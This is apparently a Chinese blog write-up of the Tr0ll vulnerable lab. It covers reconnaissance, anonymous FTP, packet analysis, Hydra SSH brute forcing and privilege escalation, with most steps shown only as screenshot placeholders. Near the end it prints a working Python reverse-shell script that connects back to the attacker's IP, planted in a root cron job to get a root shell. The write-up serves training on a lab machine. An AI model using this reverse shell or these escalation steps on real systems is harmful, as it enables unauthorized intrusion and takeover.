Tr0ll靶场复现

2024-04-22 902 0

一、环境搭建

Kali攻击机IP地址:192.168.247.145

靶机IP地址:暂时未知

二、信息收集

1、Nmap获取靶机地址
Tr0ll靶场复现插图

靶机地址为192.168.247.147

2、Nmap进行端口探测
Tr0ll靶场复现插图1

靶机开放了21、22、80端口,且允许默认账号Anonymous/Anonymous登录

3、目录扫描
Tr0ll靶场复现插图2

发现robots.txt中存在secret目录
  • 尝试访问web页面
    Tr0ll靶场复现插图3

未发现可利用的信息

4、指纹识别
Tr0ll靶场复现插图4

三、漏洞探测

尝试登陆ftp
Tr0ll靶场复现插图5

分析该流量包
Tr0ll靶场复现插图6

全局搜索字符串是否存在txt文件,发现secret_stuff.txt

不断点击find,发现secret_stuff.txt文件的ftp data
Tr0ll靶场复现插图7

该文件提示找到了sup3rs3cr3tdirlol

一开始还以为是哪个用户的密码,经过尝试发现是一个目录

Tr0ll靶场复现插图8

下载该文件并分析
Tr0ll靶场复现插图9

strings查找该文件的可打印字符串,提示找到地址0x0856BF

经过尝试发现也是一个目录
Tr0ll靶场复现插图10

打开第一个文件夹
Tr0ll靶场复现插图11

存在一堆字符,感觉是用户名

打开第二个文件夹
Tr0ll靶场复现插图12

发现Pass.txt,难不成这个就是密码?!

将第一个文件做成用户名字典,第二个文件做成密码,尝试爆破ssh
Tr0ll靶场复现插图13

emmm...失败了,通过查阅资料发现,是将文件名当作密码
Tr0ll靶场复现插图14

通过参数-p指定密码为Pass.txt,获得ssh的账号密码为overflow/Pass.txt

四、权限提升

登陆ssh
Tr0ll靶场复现插图15

查看系统信息
Tr0ll靶场复现插图16

搜索本地提权漏洞
Tr0ll靶场复现插图17

将文件复制到当前桌面目录
Tr0ll靶场复现插图18

利用python启用http简易服务传输文件

Tr0ll靶场复现插图19
Tr0ll靶场复现插图20

查看flag文件
Tr0ll靶场复现插图21

五、拓展与总结

登陆ssh后发现几分钟后shell就会断开,应该是配置了计划任务,查看计划任务
Tr0ll靶场复现插图22

*/2 * * * * cleaner.py
*/2:分钟字段,表示每分钟都执行一次。* 表示每分钟,/2 表示每个值(在这里是分钟)都执行一次。
*:小时字段,表示每小时都执行一次。* 表示每个小时。
*:日期字段,表示每天都执行一次。* 表示每个日期。
*:月份字段,表示每个月都执行一次。* 表示每个月。
*:星期字段,表示每周都执行一次。* 表示每个星期。
总结为分、时、日、月、周

脚本的作用是删除/tmp目录下的所有文件并退出程序

查看该文件的权限信息
Tr0ll靶场复现插图23

1、反弹shell(此处靶机修改了一下环境,ip变为192.168.247.148)

#!/usr/bin/python
def con():
	import socket, time,pty, os
	host='192.168.247.145'
	port=9999
	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.settimeout(10)
	s.connect((host,port))
	os.dup2(s.fileno(),0)
	os.dup2(s.fileno(),1)
	os.dup2(s.fileno(),2)
	os.putenv("HISTFILE",'/dev/null')
	pty.spawn("/bin/bash")
	s.close()
con()

Tr0ll靶场复现插图24

Tr0ll靶场复现插图25

2、新增root可执行程序
Tr0ll靶场复现插图26

执行程序
Tr0ll靶场复现插图27

3、为overflow用户添加sudo权限
Tr0ll靶场复现插图28

Tr0ll靶场复现插图29

此次打靶涉及的知识点有常规的信息收集(端口、目录、指纹)、ftp匿名登录、流量分析、文件分析、hydra爆破以及多种提权方式等。


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

办事处网络安全监控与事件响应;国外员工终端安全性怎么保障 | FB甲方群话题讨论
拿不下总统之位,那就用热加载拿下验证码识别与爆破好了!
Sooty:一款SoC分析一体化与自动化CLI工具
shiro CVE-2016-6802 路径绕过(越权)
Apache Solr 身份验证绕过漏洞(CVE-2024-45216)详解
llama_index的CVE-2024-4181漏洞根因分析

发布评论